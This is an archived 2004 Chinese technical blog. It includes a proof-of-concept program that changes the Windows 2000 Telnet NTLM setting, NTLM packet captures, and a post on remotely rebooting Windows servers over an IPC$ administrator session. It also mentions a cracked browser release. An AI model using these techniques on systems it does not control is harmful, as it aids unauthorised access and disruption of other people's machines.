TNTLM.cpp ------------------------ /** (C) Copyright Nsfocus. 2000* All Rights Reserved* * TNTLM.cpp: Modify authentication method of Microsoft Windows* 2000 Telnet Server.** Usage: TNTLM [option]* option: 0 - No NTLM authentication (default)* 1 - Try NTLM authentication first.* If failed, then try username/password.* 2 - Require NTLM authentication.** Written by: backend, <backend@nsfocus.com>* <http://www.nsfocus.com>* Date: 2000/08/31** WARNING: THIS PROGRAM IS JUST FOR EDUCATIONAL PURPOSE!!!* YOU ARE USING THIS SOFTWARE ON YOUR OWN RISK. THIS IS A* PROOF-OF-CONCEPT PROGRAM AND YOU TAKE FULL RESPONSIBILITY* FOR WHAT YOU DO WITH IT! DO NOT ABUSE THIS FOR ILLICIT* PURPOSES!** Greetings to: Netguy*/#include <windows.h>#include <stdlib.h>#include <stdio.h>int main(int argc, char* argv[]){HKEY hKey;char SubKeyName[] ="SOFTWARE\\Microsoft\\Windows\\TelnetServer\\1.0";char ValueName[] = "NTLM";DWORD NewValue = 0;if ( argc > 1 ) NewValue = atol( argv[1] );if ( RegOpenKeyEx(HKEY_LOCAL_MACHINE, SubKeyName, 0, KEY_ALL_ACCESS,&hKey) != ERROR_SUCCESS ) { perror( "RegOpenKeyEx" ); return -1;}if ( RegSetValueEx( hKey, ValueName, 0, REG_DWORD, ( CONST BYTE * )&NewValue, sizeof( DWORD )) != ERROR_SUCCESS ) { perror( "RegSetValueEx" ); RegCloseKey( hKey ); return -1;}RegCloseKey( hKey );return 0;}- ------------------------ TNTLM.cpp ------------------------可以看到 如果使用 NTLM 的话不需输入密码就进入系统同样的情况还会发生在 网上邻居访问时和连接 MS SQL Server 时这在很多时候做身份验证很方便The NTLM Authentication Protocolhttp://davenport.sourceforge.net/ntlm.htmlWhat is NTLM?NTLM is an authentication protocol used in various Microsoft network protocol implementations and supported by the NTLM Security Support Provider ("NTLMSSP"). Originally used for authentication and negotiation of secure DCE/RPC, NTLM is also used throughout Microsoft's systems as an integrated single sign-on mechanism. NTLM employs a challenge-response mechanism for authentication, in which clients are able to prove their identities without sending a password to the server. It consists of three messages, commonly referred to as Type 1 (negotiation), Type 2 (challenge) and Type 3 (authentication). It basically works like this: The client sends a Type 1 message to the server. This primarily contains a list of features supported by the client and requested of the server. The server responds with a Type 2 message. This contains a list of features supported and agreed upon by the server. Most importantly, however, it contains a challenge generated by the server. The client replies to the challenge with a Type 3 message. This contains several pieces of information about the client, including the domain and username of the client user. It also contains one or more responses to the Type 2 challenge. The responses in the Type 3 message are the most critical piece, as they prove to the server that the client user has knowledge of the account password. 那么NTLM 是怎么验证的呢?以共享为例,具体的方法是这样的:1、客户端<--------------------建立TCP连接----------------->服务端2、客户端-------客户端类型、支持的服务方式列表等----------->服务端 3、客户端<------服务器支持协议、认证方式、加密用的key等-----服务端4、客户端--------------用户名、加密后密码----------------->服务端 5、客户端<---------------认证成功否-----------------------服务端 微软采用NTLM机制:如在一个NT域中,客户机登录域服务器时,首先由服务器向客户端发送一段随机值,客户端用自己密码的散列函数对这个随机值进行混编并返还给服务器,服务器由本地的SAM数据库中读取该用户的密码散列函数对它发出的随机值进行混编,最后把两个结果进行比较,如果相同,即认证通过。通过IRIS对TELNET过程的分析:<摘自 ntlm验证机制学习札记 awen 2003-1-16><http://www.patching.net/org/content/25.htm>=====================================================================客户端-------客户端类型、支持的服务方式列表等----------->服务端=====================================================================No: 9Timestamp: 19:43:48:362MAC source address: 00:50:BF:2A:40:64MAC dest address: 00:09:7B:51:BB:FCFrame type: IPProtocol: TCP-> TELNETSource IP address: awenDest IP address: fldserverSource port: 2255Destination port: 23SEQ: 1865769009ACK: 1218937261Packet size: 103Packet data:0000: 00 09 7B 51 BB FC 00 50 BF 2A 40 64 08 00 45 00 ..{Q...P.*@d..E.0010: 00 59 B2 19 40 00 80 06 8F 74 AC 11 01 BC D3 41 .Y..@....t.....A0020: 38 02 08 CF 00 17 6F 35 60 31 48 A7 81 AD 50 18 8.....o5`1H...P.0030: FA D6 DC 15 00 00 FF FA 25 00 0F 00 00 20 00 00 ........%.... ..0040: 00 02 00 00 00 4E 54 4C 4D 53 53 50 00 01 00 00 .....NTLMSSP....0050: 00 97 82 08 E0 00 00 00 00 00 00 00 00 00 00 00 ................0060: 00 00 00 00 00 FF F0 .......=====================================================================客户端-------客户端类型、支持的服务方式列表等----------->服务端===================================================================== No: 10Timestamp: 19:43:48:462MAC source address: 00:09:7B:51:BB:FCMAC dest address: 00:50:BF:2A:40:64Frame type: IPProtocol: TCP-> TELNETSource IP address: fldserverDest IP address: awenSource port: 23Destination port: 2255SEQ: 1218937261ACK: 1865769058Packet size: 229Packet data:0000: 00 50 BF 2A 40 64 00 09 7B 51 BB FC 08 00 45 00 .P.*@d..{Q....E.0010: 00 D7 F7 84 40 00 7E 06 4B 8B D3 41 38 02 AC 11 ....@...K..A8...0020: 01 BC 00 17 08 CF 48 A7 81 AD 6F 35 60 62 50 18 ......H...o5`bP.0030: FA A4 1E B5 00 00 FF FA 25 02 0F 00 01 9E 00 00 ........%.......0040: 00 02 00 00 00 4E 54 4C 4D 53 53 50 00 02 00 00 .....NTLMSSP....0050: 00 12 00 12 00 30 00 00 00 15 82 8A E0 ED 83 37 .....0.........70060: 4B DD 44 1F 96 00 00 00 00 00 00 00 00 5C 00 5C K.D..........\.\0070: 00 42 00 00 00 46 00 4C 00 44 00 53 00 45 00 52 .B...F.L.D.S.E.R0080: 00 56 00 45 00 52 00 02 00 12 00 46 00 4C 00 44 .V.E.R.....F.L.D0090: 00 53 00 45 00 52 00 56 00 45 00 52 00 01 00 12 .S.E.R.V.E.R....00A0: 00 46 00 4C 00 44 00 53 00 45 00 52 00 56 00 45 .F.L.D.S.E.R.V.E00B0: 00 52 00 04 00 12 00 66 00 6C 00 64 00 73 00 65 .R.....f.l.d.s.e00C0: 00 72 00 76 00 65 00 72 00 03 00 12 00 66 00 6C .r.v.e.r.....f.l00D0: 00 64 00 73 00 65 00 72 00 76 00 65 00 72 00 00 .d.s.e.r.v.e.r..00E0: 00 00 00 FF F0 .....=====================================================================客户端--------------用户名、加密后密码----------------->服务端 服务器的名称awen 用户名为admin,后面是加密后的散列值=====================================================================No: 11Timestamp: 19:43:48:472MAC source address: 00:50:BF:2A:40:64MAC dest address: 00:09:7B:51:BB:FCFrame type: IPProtocol: TCP-> TELNETSource IP address: awenDest IP address: fldserverSource port: 2255Destination port: 23SEQ: 1865769058ACK: 1218937436Packet size: 225Packet data:0000: 00 09 7B 51 BB FC 00 50 BF 2A 40 64 08 00 45 00 ..{Q...P.*@d..E.0010: 00 D3 B2 1A 40 00 80 06 8E F9 AC 11 01 BC D3 41 ....@..........A0020: 38 02 08 CF 00 17 6F 35 60 62 48 A7 82 5C 50 18 8.....o5`bH..\P.0030: FA 27 6F 63 00 00 FF FA 25 00 0F 00 02 9A 00 00 .‘oc....%.......0040: 00 02 00 00 00 4E 54 4C 4D 53 53 50 00 03 00 00 .....NTLMSSP....0050: 00 18 00 18 00 5A 00 00 00 18 00 18 00 72 00 00 .....Z.......r..0060: 00 08 00 08 00 40 00 00 00 0A 00 0A 00 48 00 00 .....@.......H..0070: 00 08 00 08 00 52 00 00 00 10 00 10 00 8A 00 00 .....R..........0080: 00 15 82 88 E0 41 00 57 00 45 00 4E 00 61 00 64 .....A.W.E.N.a.d0090: 00 6D 00 69 00 6E 00 41 00 57 00 45 00 4E 00 68 .m.i.n.A.W.E.N.h00A0: B6 54 08 3F 5F 5D A5 00 00 00 00 00 00 00 00 00 .T.?_]..........00B0: 00 00 00 00 00 00 00 29 B6 96 5E FB 78 C1 1A 96 .......)..^.x...00C0: EC 11 A7 D4 D5 1A CC 72 D2 1A 98 61 3C 8E DA 51 .......r...a...Q00D0: 08 28 F8 1C F9 77 8F 4A 41 32 94 3B 9E 97 42 FF .(...w.JA2.;..B.00E0: F0 .=====================================================================验证通过=====================================================================No: 16Timestamp: 19:43:48:853MAC source address: 00:09:7B:51:BB:FCMAC dest address: 00:50:BF:2A:40:64Frame type: IPProtocol: TCP-> TELNETSource IP address: fldserverDest IP address: awenSource port: 23Destination port: 2255SEQ: 1218937454ACK: 1865769242Packet size: 609Packet data:0000: 00 50 BF 2A 40 64 00 09 7B 51 BB FC 08 00 45 00 .P.*@d..{Q....E.0010: 02 53 F7 87 40 00 7E 06 4A 0C D3 41 38 02 AC 11 .S..@...J..A8...0020: 01 BC 00 17 08 CF 48 A7 82 6E 6F 35 61 1A 50 18 ......H..no5a.P.0030: F9 EC 0A F5 00 00 1B 5B 31 3B 31 48 2A 3D 3D 3D .......[1;1H*===0040: 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D ================0050: 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D ================0060: 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D ================0070: 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 20 20 20 20 ============ 0080: 20 20 20 20 20 20 20 20 20 20 20 20 1B 5B 32 3B .[2;0090: 31 48 BB B6 D3 AD CA B9 D3 C3 20 4D 69 63 72 6F 1H........ Micro00A0: 73 6F 66 74 20 54 65 6C 6E 65 74 20 B7 FE CE F1 soft Telnet ....00B0: C6 F7 A1 A3 20 20 20 20 20 20 20 20 20 20 20 20 .... 00C0: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00D0: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00E0: 20 20 1B 5B 33 3B 31 48 2A 3D 3D 3D 3D 3D 3D 3D .[3;1H*=======00F0: 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D ================0100: 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D ================0110: 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D 3D ================0120: 3D 3D 3D 3D 3D 3D 3D 3D 20 20 20 20 20 20 20 20 ======== 0130: 20 20 20 20 20 20 20 20 1B 5B 34 3B 31 48 43 3A .[4;1HC:0140: 5C 3E 20 20 20 20 20 20 20 20 20 20 20 20 20 20 \. 0150: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0160: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0170: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0180: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 1B 5B .[0190: 35 3B 31 48 1B 5B 4B 1B 5B 36 3B 31 48 1B 5B 4B 5;1H.[K.[6;1H.[K01A0: 1B 5B 37 3B 31 48 1B 5B 4B 1B 5B 38 3B 31 48 1B .[7;1H.[K.[8;1H.01B0: 5B 4B 1B 5B 39 3B 31 48 1B 5B 4B 1B 5B 31 30 3B [K.[9;1H.[K.[10;01C0: 31 48 1B 5B 4B 1B 5B 31 31 3B 31 48 1B 5B 4B 1B 1H.[K.[11;1H.[K.01D0: 5B 31 32 3B 31 48 1B 5B 4B 1B 5B 31 33 3B 31 48 [12;1H.[K.[13;1H01E0: 1B 5B 4B 1B 5B 31 34 3B 31 48 1B 5B 4B 1B 5B 31 .[K.[14;1H.[K.[101F0: 35 3B 31 48 1B 5B 4B 1B 5B 31 36 3B 31 48 1B 5B 5;1H.[K.[16;1H.[0200: 4B 1B 5B 31 37 3B 31 48 1B 5B 4B 1B 5B 31 38 3B K.[17;1H.[K.[18;0210: 31 48 1B 5B 4B 1B 5B 31 39 3B 31 48 1B 5B 4B 1B 1H.[K.[19;1H.[K.0220: 5B 32 30 3B 31 48 1B 5B 4B 1B 5B 32 31 3B 31 48 [20;1H.[K.[21;1H0230: 1B 5B 4B 1B 5B 32 32 3B 31 48 1B 5B 4B 1B 5B 32 .[K.[22;1H.[K.[20240: 33 3B 31 48 1B 5B 4B 1B 5B 32 34 3B 31 48 1B 5B 3;1H.[K.[24;1H.[0250: 4B 1B 5B 32 35 3B 31 48 1B 5B 4B 1B 5B 34 3B 35 K.[25;1H.[K.[4;50260: 48 H===================================================================== More...Posted by windtear at 2:48 AM
May 11, 2004
tsweb msrdp terminal port support patch - 支持端口的补丁 我爱网络
默认情况下 tsweb 使用 3389 作为 terminal/rdp 端口连接并且 tsweb 不支持类似 server:port 的输入方式改变端口如果想访问非默认端口的 rdp server只能修改 tsweb 服务器的 default.htm 文件根据 Microsoft Knowledge Base Article - 326945 提示 http://support.microsoft.com/?id=326945 《如何更改 Windows 终端服务器 Web 客户端中的侦听端口》给出如下代码 (patch) 供参考tswebsetup.exe 489,776 2003/05/15 23:03:186.00.2509.0000 (main.010702-1146)-----> 增加代码 'port support server:port portPos = Instr(serverName,":") if portPos > 0 then portValue = Right(serverName,Len(serverName)-portPos) if IsNumeric(portValue) then MsRdpClient.AdvancedSettings2.RDPPort = portValue end if MsRdpClient.server = Left(serverName,portPos-1) else MsRdpClient.server = serverName end if-----> patch--- orig.default.htm Tue Mar 25 00:00:00 2003+++ default.htm Tue May 11 21:09:32 2004@@ -189,7 +189,18 @@ serverName = trim(serverName) On Error Resume Next- MsRdpClient.server = serverName+ 'port support server:port+ portPos = Instr(serverName,":")+ if portPos > 0 then+ portValue = Right(serverName,Len(serverName)-portPos)+ if IsNumeric(portValue) then+ MsRdpClient.AdvancedSettings2.RDPPort = portValue+ end if+ MsRdpClient.server = Left(serverName,portPos-1)+ else+ MsRdpClient.server = serverName+ end if+ If Err then msgbox L_InvalidServerName_ErrorMessage,0,L_RemoteDesktopCaption_ErrorMessage Err.Clear More...Posted by windtear at 9:21 PM
通过TCP/139网邻(网上邻居)方式远程重起Windows服务器 我爱网络
1.通过网邻 shutdown 重起2.通过网邻 at 重起-----> 1. shutdown -r -m \\IPD:\>net use \\166.111.XXX.YY\ipc$ password /user:administrator命令成功完成。D:\>shutdown (可以从 xp 上拷贝)Usage: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy] No args Display this message (same as -?) -i Display GUI interface, must be the first option -l Log off (cannot be used with -m option) -s Shutdown the computer -r Shutdown and restart the computer -a Abort a system shutdown -m \\computername Remote computer to shutdown/restart/abort -t xx Set timeout for shutdown to xx seconds -c "comment" Shutdown comment (maximum of 127 characters) -f Forces running applications to close without warning -d [u][p]:xx:yy The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)D:\>shutdown -r -m \\166.111.XXX.YY-----> 2. at \\IPD:\>net time \\166.111.XXX.YY\\166.111.XXX.YY 的当前时间是 2004/5/11 上午 06:14命令成功完成。D:\>at \\166.111.XXX.YY清单是空的。-----> 重起成功D:\>net time \\166.111.XXX.YY服务仍未启动。请键入 NET HELPMSG 2184 以获得更多的帮助。 More...Posted by windtear at 7:19 PM
NetCaptor 7.51 发布 - 一个老牌的多页面WWW浏览器 我爱网络
NetCaptor.v7.51.WinALL.Cracked.FIXED-CORE其实不用 crack 功能并不损失多少不crack 或者不输入 key 显示的是 personal edition 不是 proNetCaptor 功能人性化不少(这个似乎也是99年开始用的 用过好久 后来跟进 MyIE 了)改进很多 可以配置比如敲url 新tab打开hide from close all新开链接 还是不如 myie 的 拖拉爽 (当然可以 锁定解决)倒是可以 拖拉(链接或者选中字符)到地址栏了默认定制的快捷连接 很不错翻译网址看起来也很丰盛google 中文需要patch一下默认URL 加上 ie=zh-CNToolsQuickSeach...http://www.google.com/search?q=%s&ie=zh-CN&hl=zh-CN&btnG=Google%E6%90%9C%E7%B4%A2&lr=http://www.netcaptor.com/NetCaptor is the most powerful web browser on the planet! Other browsers only show one page at a time or squish them together in an overlapping mess. NetCaptor gives each More...Posted by windtear at 7:08 PM
Babylon 5.0.0(r78) 发布 - 一个很小巧强悍的多语字典 我爱网络
可以很方便的对屏幕取词翻译(OCR)可以定制快捷键可以增减字典可以语音可以定制web搜索引擎可以在线可以进行货币、时区转换可以 cross translation 可以复制 直接粘贴单词到第二活动窗口输入框可以查看单复数、各种时态小巧精悍babylon50_setup_eng_eng_chs_eng.exe14,304,256 BytesFD5A5CBD33319C3CBF6BAE785761A216 babylon50_setup_eng_eng_chs_eng.exezip 自解压格式 83% 压缩率eng_eng.bgl 6,299,318 04-05-05 17:30eng_chs.bgl 2,653,215 04-05-05 17:27作者: Babylon Ltd. 作者电子邮件: linguistic-support@babylon.com 说明: This comprehensive Chinese(S)-English dictionary contains words, phrases, abbreviations & acronyms. It includes terms from a vast variety of subjects, such as Medicine, Electronics, Zoology, Business, Computers, Religion, etc. 定义编号: 56920 创建日期: 2000-5-29 最近更新: 2004-4-25 版本: 5.0建议词语 推荐使用本词汇表Online Dictionary Software by Babylonhttp://www.babylon.com/Babylon-Pro 5.0 The world's leading dictionary software. Babylon enables you to translate any word More...Posted by windtear at 1:10 AM
May 10, 2004
windows版本的linux小工具 - GnuWin32 - Win32-versions of GNU tools 我爱网络
习惯了 linux 下的各种小工具其实很多小工具都有 windows 版本 很多windows下不错的小工具也有linux的移植版不光小工具 大工具服务也有 比如blog前面提过的 squid当然还有著名的apache php perl python vim emacs cvs pure-ftpd .... 太多了太多了这里面有一些小工具的windows版本http://sourceforge.net/projects/gnuwin32/Project: GnuWin32: Summary GnuWin32 provides Win32-versions of GNU tools, or tools with a similar open source licence. The ports are native ports, that is they rely only on libraries provided with any 32-bits MS-Windows operating system, such as MS-Windows 95 / 98 / More...Posted by windtear at 7:02 PM
May 9, 2004
IPCN简化设置Proxy 我爱网络
[IPCN Proxy] 简化设置与微软代理2004-05-23 02:33 修改 微软的破代理早不能用了 脚本也早改了1.简化设置 IE 系列用户访问 http://proxy.ipcn.org/ipcn.vbe 或者使用如下两个网址(任何一个,只需一个) http://proxy2.ipcn.org/ipcn.vbe http://download.smth.edu.cn/pcdownload.php?fid=165 在弹出的"文件下载"窗口点击打开即可完成设置 重新启动 IE 即可 另外:如果平时发现代理无法使用,可以尝试重新启动 IE 解决2.微软代理 根据网友提议 把微软部分[注1]访问请求转给微软官方代理 202.194.15.124:8080 只需按 1 所述操作即可 无需任何额外设置3.已经设置过"自动配置脚本"的用户 也可进行 1 所述操作,也可不理会 不欢迎其他方式设置(如代理端口设置 非WWW浏览器设置...) 由于脚本会经常变化(如策略变化 服务器变化 端口变化...) 所以保存在本地硬盘可能会无法使用 MSN Messenger 推荐代理 202.194.15.124:8080 另外:如果平时发现代理无法使用,可以尝试重新启动 IE 解决4.代理主页 http://proxy.ipcn.org/ http://proxy.ipcn.org/#proxyaccount[注1].microsoft.com.passport.com.passport.net.passportimages.com.windowsupdate.com.hotmail.com.msn.com.msdnaa.net.interactservices.com.thespoke.net.gotdotnet.com.asp.net.wimdows.net.worldofdotnet.net.wimdows.net.c-sharpcorner.com.imaginecup.com-----> orig articles of minesquid ipcn.pac use URLHash2 of SPS(Super Proxy Script) - remove ipcnauth (2004-04-28)squid-2.5.STABLE5 以及 IPCN 的一些调整 (2004-04-17)ipcn.pac (2004-02-16)[IPCN] proxy.ipcn.org 使用设置调整公告 (2004-02-16)[IPCN] 俺家代理的一个人性化改动 +补充说明 (2004-02-12) More...Posted by windtear at 6:04 PM
反病毒/反垃圾 AntiVirus/AntiSpam clamav/SpamAssassin 我爱网络
clamav - Clam AntiVirus http://www.clamav.net/stable downloadhttp://prdownloads.sourceforge.net/clamavhttp://switch.dl.sourceforge.net/sourceforge/clamav/clamav-0.70.tar.gzSpamAssassinhttp://www.spamassassin.org/index.htmlhttp://www.spamassassin.org/downloads.htmlhttp://www.spamassassin.org/released/Mail-SpamAssassin-2.63.tar.gz-----> http://www.tmu.edu.tw/cbi/net/rpt/tmu-mail.htm@tmu.edu.tw ?]件伺服器病毒/垃圾?]件防堵?C制系?y?f明本校?]件伺服器於本 (93) 年4月份?{整病毒/垃圾?]件防堵?C制系?y,有?P系?y架?????⒖家韵抡f明。l 防堵???t (拒收具?湟韵绿蒯缰??]件)a. 附加?n案之副?n名 (.attach file)拒收所有附加?n的副?n名如下exevbspifscrbatcomb. ?V告垃圾?]件 (spam)凡是在 RBL (Realtime Blackhole List) 上登??有案的都???? spam?? RBL ?⒖? relays.ordb.org 之?Y料??c. ?? clamavd ?叨疽?擎,??信件被判定?楹?病毒?]件者。d. 信件?热萁? SpamAssassin 判定???V告垃圾?]件者。l 系?y架?? ◎ 有任何建?h,?g迎您的?硇牛??硇耪?寄 netgroup@tmu.edu.tw-----> by qqhpostfix+amavisd+clamavd+trendmicroclamavd的升级比trendmicro慢一些,大概就是小时数量级,不过是免费的,扫描效率高于trend,所以把trend放到后面一级了查些漏网之鱼amavisd还可以挂spamassis,用着还行如果最后的邮件要投递给其他mta,改改master.cf就可以了,很方便-----> antispam http://140.111.1.22/tanet/spam.html5.是否??有其他 spam 相?P的?W站 ? 以下?橐恍? anti-spam 的?W站: spam.abuse.net Anti-Spam Cadre Anti-Spam Directory of Information and Resources Best Spam -- Selection More...Posted by windtear at 3:20 AM
May 8, 2004
WinPIM 一个序列号可以在两台机器上同时使用 我爱网络
发信人: windtear (禁一切论文无关事), 信区: NewSoftware标 题: WinPIM 一个序列号可以在两台机器上同时使用发信站: BBS 水木清华站 (Sat May 8 02:20:37 2004), 站内http://www.scxingao.com/cgi-bin/lb5000/topic.cgi?forum=2&topic=1891http://www.scxingao.com/cgi-bin/lb5000/topic.cgi?forum=2&topic=1905http://www.scxingao.com/cgi-bin/lb5000/topic.cgi?forum=2&topic=2498问: 我只在两台电脑上用 能用一个注册码吗?作者尹强答:可以,交换数据请使用数据同步工具:http://www.winpim.com/chs/data_folder_sync.htm(可惜 这个还要 20元 呵呵)不过倒是解决了办公室 宿舍两套的问题-- ---== 马甲档案 ==---Thu Oct 14 10:31:21 1999 ~ Wed May 5 21:11:49 200410000/25335/16687.166666666666666666666666666666666 最近光临日期 : Wed May 5 21:18:53 20041998-01-13 ~~~※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.154.35] More...Posted by windtear at 2:23 AM
arping 解决mm无理抢IP行为 我爱网络
Menu options (THUNet_35-HaoLou_Switch): ---------------------------------------- system - Administer system-level functions ethernet - Administer Ethernet ports bridge - Administer bridging/VLANs ip - Administer IP snmp - Administer SNMP analyzer - Administer Roving Analysis script - Run a script of console commands logout - Logout of the Administration Console Type ? for help.--------------------------------------------------------------------------------Select menu option: ipMenu options (THUNet_35-HaoLou_Switch): ---------------------------------------- interface - Administer interfaces route - Administer routes arp - Administer the ARP cache dns - Administer DNS rip - Administer RIP ping - Send ICMP echo request advancedPing - Send ICMP echo request with advanced options traceRoute - Track the route of IP packet advancedTraceRoute - Track the route of IP packet with advanced options statistics - Display statistics Type "q" to return to the previous menu or ? for help.--------------------------------------------------------------------------------Select menu option (ip): arp There are 2 of 512 Possible ARP cache entries. IP address Type I/F Hardware address Circuit 166.111.154.1 dynamic 1 00-0b-45-84-58-0a -/- 166.111.154.35 dynamic 1 00-0b-6a-1b-2b-3e -/-Select menu option: b p a fEnter the address: 00-0b-6a-1b-2b-3eAddress found on port 3: Canonical address Type 00-0b-6a-1b-2b-3e Dynamicport 3 -> 1100 #2-------------------------------THUNet_35#-2_Switch (1)------------------Select menu option: b p a fEnter the address: 00-0b-6a-1b-2b-3eLocation VLAN ID PermanentUnit 1 Port 9 1 NoSelect menu option:35#114-2:(% /sbin/arping -c 2 166.111.154.1ARPING 166.111.154.1 from 166.111.154.35 eth0Unicast reply from 166.111.154.1 [00:0B:45:84:58:0A] 0.919msUnicast reply from 166.111.154.1 [00:0B:45:84:58:0A] 0.897msSent 2 probes (1 broadcast(s))Received 2 response(s)% 166.111.154.35 dynamic 1 00-80-c8-eb-a9-89 -/-*/10 * * * * /sbin/arping -c 2 166.111.154.1 >/dev/null 2>&1 More...Posted by windtear at 12:47 AM
May 7, 2004
又支持了一下正版 买了 winpim 我爱网络
发信人: windtear (禁一切论文无关事), 信区: NewSoftware标 题: 又支持了一下正版 买了 winpim发信站: BBS 水木清华站 (Fri May 7 17:41:21 2004), 站内35¥看到前面发新版本就买了拖了几年才买3年前用的 3.x 版本的盗版-- ---== 马甲档案 ==---Thu Oct 14 10:31:21 1999 ~ Wed May 5 21:11:49 200410000/25335/16687.166666666666666666666666666666666 最近光临日期 : Wed May 5 21:18:53 20041998-01-13 ~~~※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.154.35] More...Posted by windtear at 5:49 PM
受伤的季节 eth0 老出问题 我爱网络
2004-05-04-35eth0-down.txt 2004年5月4日, 23:35:40eth0_down_20040507.txt 2004年5月7日, 1:35:32[Tue May 4 23:09:11 ~][Thu May 6 23:33:23 ~]真的是三天两头坏了[Thu May 6 23:33:23 ~]root@ipcn.org# ifconfig eth0eth0 Link encap:Ethernet HWaddr 00:80:C8:EB:A9:89 inet addr:166.111.154.35 Bcast:166.111.154.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:53673426 errors:0 dropped:9390 overruns:0 frame:0 TX packets:41433307 errors:0 dropped:0 overruns:0 carrier:0 collisions:582641 txqueuelen:100 RX bytes:3340589454 (3185.8 Mb) TX bytes:1521147809 (1450.6 Mb) Interrupt:12 Base address:0xe800[Fri May 7 01:03:49 ~]root@ipcn.org# ifconfig eth1eth1 Link encap:Ethernet HWaddr 00:00:E8:34:51:F0 inet addr:10.35.0.254 Bcast:10.35.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:34891087 errors:82 dropped:521 overruns:82 frame:0 TX packets:36546679 errors:4 dropped:0 overruns:0 carrier:4 collisions:298605 txqueuelen:100 RX bytes:3730731177 (3557.9 Mb) TX bytes:31147792 (29.7 Mb) Interrupt:9 Base address:0x3000[Fri May 7 01:04:01 ~]root@ipcn.org# ifconfig eth2eth2 Link encap:Ethernet HWaddr 00:00:B4:8B:A6:81 inet addr:169.254.0.254 Bcast:169.254.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:208 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:0 (0.0 b) TX bytes:12480 (12.1 Kb) Interrupt:5 Base address:0x220 More...Posted by windtear at 2:53 AM
May 5, 2004
AutoIndex PHP Script - A Website Directory Indexer 我爱网络
http://autoindex.sourceforge.net/AutoIndex PHP Script A Website Directory Indexer by Justin Hagstrom VersionDateDownloadVersion 1.0 for PHP 4 1.4.4 2004-May-04 Download Version 2.0 for PHP 5 2.0.0 beta 1 2004-May-04 Download PackageRelease& NotesFilenameDateSizeD/LArch.TypeAutoIndex PHP Script 1.x AutoIndex PHP 1.4.4 [show only this release]2004-05-03 21:00AutoIndex-1.4.4.tar.gz80746 0 Platform-Independent.gzAutoIndex-1.4.4.zip126806 0 Platform-Independent.zipindex.phpconfig.phpindex.php 首次访问 提示进行配置配置之后生成 AutoIndex.conf.php-----> AutoIndex.conf.php<?php/*AutoIndex.conf.php generated by config.phpPart of AutoIndex PHP Scripthttp://autoindex.sourceforge.net*//* Required settings: */$base_dir More...Posted by windtear at 1:16 AM
May 4, 2004
[norton.ipcn.org] i32 x86 说明更新 我爱网络
发信人: windtear (禁一切论文无关事), 信区: Virus标 题: [norton.ipcn.org] i32 x86 说明更新发信站: BBS 水木清华站 (Tue May 4 19:08:00 2004), 站内norton.ipcn.org 说明已更新Note: The i32 Intelligent Updater package cannot be used to update Symantec AntiVirus Corporate Edition 8.0 servers or Norton AntiVirus Corporate Edition 7.6 servers, but can be used to update Corporate Edition clients. The x86 Intelligent Updater package can be used to update Corporate Edition clients and servers. --------------------------------------------------------------------------------.vdb Supports the following versions of Symantec antivirus software:NAV 7.x Corporate Edition ---------------------------------------------------------------------------------i32.exe Supports the following versions of Symantec antivirus software:NAV 2000 for Win9x/NT/2000NAV 2001 for Win95b/98/NT/2000/MeNAV 2002 Professional EditionNAV 2002 for Win98/Me/NT/2000/XP Home/XP ProNAV 2003 Professional EditionNAV 2003 for Win98/Me/2000/XP Home/XP ProNAV 2004 Professional EditionNAV 2004 for Win98/Me/2000/XP Home/XP ProNAV 7.x Corporate Edition ClientNAV for Lotus Notes (Intel)NAV for MS Exchange (Intel)Norton SystemWorks (all versions)Norton Utilities for Windows 95/98 (all versions)SAV 3.0 CacheFlow Security GatewaySAV 3.0 for Inktomi Traffic EdgeSAV 3.0 for NetApp Filer/NetCacheSAV 3.1 for SMTP Gateways for WindowsSAV 8.0 Corporate Edition ClientSAV 8.1 Corporate Edition ClientSAV 9.0 Corporate Edition ClientSAV/Filtering 3.02 for MS Exchange 2000SAV/Filtering 3.1 for DominopcAnywhere32 7.5 and higher for WinNT ---------------------------------------------------------------------------------x86.exe Supports the following versions of Symantec antivirus software:NAV 2000 for Win9x/NT/2000NAV 2001 for Win95b/98/NT/2000/MeNAV 2002 Professional EditionNAV 2002 for Win98/Me/NT/2000/XP Home/XP ProNAV 2003 Professional EditionNAV 2003 for Win98/Me/2000/XP Home/XP ProNAV 2004 Professional EditionNAV 2004 for Win98/Me/2000/XP Home/XP ProNAV 7.x Corporate EditionNAV for Gateways 2.x (WinNT/2000)NAV for Lotus Notes (Intel)NAV for MS Exchange (Intel)SAV 3.0 CacheFlow Security GatewaySAV 3.0 for Inktomi Traffic EdgeSAV 3.0 for NetApp Filer/NetCacheSAV 3.1 for SMTP Gateways for WindowsSAV 8.01 (Build 457 and above) Corporate Edition ClientSAV 8.01 (any Build prior to 457) Corporate Edition Client or ServerSAV 8.1 Corporate Edition ClientSAV 9.0 Corporate Edition ClientSAV/Filtering 3.02 for MS Exchange 2000SAV/Filtering 3.1 for DominoSymantec AntiVirus Scan Engine for Windows 2000 